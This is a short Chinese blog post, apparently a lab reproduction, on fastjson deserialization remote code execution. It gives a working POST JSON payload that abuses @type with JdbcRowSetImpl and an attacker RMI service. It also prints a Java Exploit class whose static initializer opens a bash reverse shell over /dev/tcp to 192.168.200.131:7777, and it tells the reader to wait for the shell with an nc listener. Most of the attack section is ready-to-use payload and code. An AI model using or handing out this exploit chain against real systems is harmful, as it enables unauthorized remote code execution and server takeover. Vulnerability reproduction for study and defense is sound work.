-
fastjson远程命令执行
fastjson远程代码执行
漏洞原因:fastjson在对json字符串反序列化的时候,会读取到@type的内容,将json内容反序列化为java对象并调用这个类的setter方法。
1、搭建rmi服务
直接利用jndi-exploit工具
2、抓包改为POST。开启nc监听、发包
POST的json数据:
Content-Type: application/json Content-Length: 你的数据长度 { "a":{ "@type":"java.lang.Class", "val":"com.sun.rowset.JdbcRowSetImpl" }, "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"开的RMI服务", "autoCommit":true } }- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
这里响应400不用管(环境原因)。vps上看到反弹shell是收到了的
收到shell
使用恶意文件反弹shell过程
// javac Exploit.java import java.lang.Runtime; import java.lang.Process; public class Exploit { static { try { Runtime rt = Runtime.getRuntime(); String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/192.168.200.131/7777 0>&1"}; Process pc = rt.exec(commands); pc.waitFor(); } catch (Exception e) { // do nothing } } }- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
具体过程和log4j2一样。
可以看看上一篇文章
log4j2漏洞复现 -
相关阅读:
JSP自定义标签(foreach标签与select标签的自定义方式)
ubuntu主机之间移植python环境并修改pip指向
一个用Go构建Windows、Linux、MacOSX的跨平台桌面应用程序
开发操作系统内核环境搭建
【EMC专题】传导骚扰源和辐射骚扰源1
【MySQL系列】MySQL数据库基础
微信小程序开发学习—Day2
javascrip非标准 json格式转换为标准格式
C++智能指针
云原生【Docker】—— 认识 Docker、Docker 与虚拟机对比、Docker 组件
- 原文地址:https://blog.csdn.net/m0_52920608/article/details/132925630
